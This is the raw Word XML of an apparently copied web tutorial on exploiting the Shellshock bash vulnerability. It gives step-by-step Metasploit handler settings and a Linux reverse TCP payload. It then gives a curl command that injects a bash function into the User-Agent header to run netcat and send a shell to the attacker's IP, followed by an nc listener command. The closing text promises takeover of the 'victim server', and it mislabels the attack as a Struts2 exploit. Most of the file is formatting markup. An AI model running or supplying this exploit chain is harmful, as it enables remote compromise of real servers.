            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> exploit(multi/handler) &gt; set</w:t>
            </w:r>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LHOST 0.0.0.0</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LHOST =&gt; 0.0.0.0</w:t>
            </w:r>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6"/>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msf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> exploit(multi/handler) &gt; set</w:t>
            </w:r>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LPORT 4444</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LPORT =&gt; 4444</w:t>
            </w:r>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7"/>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msf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> exploit(multi/handler) &gt; set</w:t>
            </w:r>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">PAYLOAD </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/x86/shell/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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PAYLOAD =&gt; </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/x86/shell/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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AA737B" w:rsidRPr="00AA737B" w:rsidTr="00AA737B">
        <w:trPr>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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>msf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> exploit(multi/handler) &gt; show options</w:t>
            </w:r>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Output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:color w:val="E20085"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:drawing>
            <wp:inline distT="0" distB="0" distL="0" distR="0">
              <wp:extent cx="5755705" cy="3848100"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:docPr id="1" name="Picture 1" descr="how-to-exploit-shellshock-vulnerability-cve-2014-627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to-exploit-shellshock-vulnerability-cve-2014-6271">
                        <a:hlinkClick r:id="rId1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531" cy="3853332"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </pic:spPr>
                  </pic:pic>
                </a:graphicData>
              </a:graphic>
            </wp:inline>
          </w:drawing>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>click</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
        <w:r w:rsidRPr="00AA737B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="E20085"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> to enlarge</w:t>
        </w:r>
      </w:hyperlink>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On the above example we are using a Linux X86 Shell Reverse TCP payload, off course the type of payload shall be different if we are targeting a Windows machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:spacing w:after="255" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111111"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>EXPLOIT THE TARGET</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:spacing w:after="255"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We are now going to send our exploit in order to create a reverse shell using a bash terminal and forward the traffic through the MSF handler using TCP protocol.</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Bash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7"/>
        <w:gridCol w:w="45"/>
      </w:tblGrid>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 Replace "YOUR-IP" with your tunnel IP or host </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>adddress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>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Replace "YOUR-PORT" with the port you configured in your tunneling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">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A737B" w:rsidRPr="00AA737B" w:rsidTr="00AA737B">
        <w:trPr>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curl -k -H 'User-Agent: () { :;}; /bin/bash -c "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> YOUR-IP YOUR-PORT -e /bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>"'</w:t>
            </w:r>
            <w:hyperlink r:id="rId19" w:history="1">
              <w:r w:rsidRPr="00AA737B">
                <w:rPr>
                  <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                  <w:color w:val="0000FF"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://example.com/cgi-bin/wspd_cgi.sh/login.htm</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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 xml:space="preserve">You are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>done !!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you targeted website is vulnerable to Struts2 exploit, a session has been created in your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> allowing you to take over the victim server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:spacing w:after="0"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b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Optional</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">For demonstration purpose we used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, but you can obtain the exact same result using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and setup your tool to listen your forwarding port as the example described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7"/>
        <w:gridCol w:w="45"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidTr="00AA737B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="2"/>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Replace "4444" with the port you configured in your tunneling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidTr="00AA737B">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00AA737B" w:rsidRPr="00AA737B" w:rsidRDefault="00AA737B" w:rsidP="00AA737B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>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nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>lvnp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA737B">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00522B39" w:rsidRDefault="00AA737B">
      <w:r w:rsidRPr="00AA737B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>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7B6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5EF8D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DD78F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E0CD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7B"/>
    <w:rsid w:val="002512D0"/>
    <w:rsid w:val="005456EC"/>
    <w:rsid w:val="00AA737B"/>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D2212-45D4-4A2B-AEFB-371D64A3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7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AA737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7B"/>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AA737B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="entry-meta-item">
    <w:name w:val="entry-meta-item"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AA737B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="author">
    <w:name w:val="author"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AA737B"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA737B"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="penci-post-countview-number">
    <w:name w:val="penci-post-countview-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AA737B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="penci-social-buttons">
    <w:name w:val="penci-social-buttons"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AA737B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="penci-social-share-text">
    <w:name w:val="penci-social-share-text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AA737B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="penci-share-number">
    <w:name w:val="penci-share-number"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00AA737B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA73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37B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA73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94432">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1962373169">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="165"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1483039769">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="360"/>
          <w:marBottom w:val="360"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1430471670">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1864203849">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="15797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980">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1128351427">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="19613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065">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="240"/>
              <w:marBottom w:val="240"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="6" w:space="15" w:color="F5F5F5"/>
                <w:left w:val="single" w:sz="6" w:space="15" w:color="F5F5F5"/>
                <w:bottom w:val="single" w:sz="6" w:space="0" w:color="F5F5F5"/>
                <w:right w:val="single" w:sz="6" w:space="15" w:color="F5F5F5"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1686706627">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="150"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                </w:div>
                <w:div w:id="983588118">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="300"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="774520641">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="976570662">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                        <w:div w:id="12801851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26381981">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="300"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="44641501">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1080904226">
                          <w:marLeft w:val="0"/>
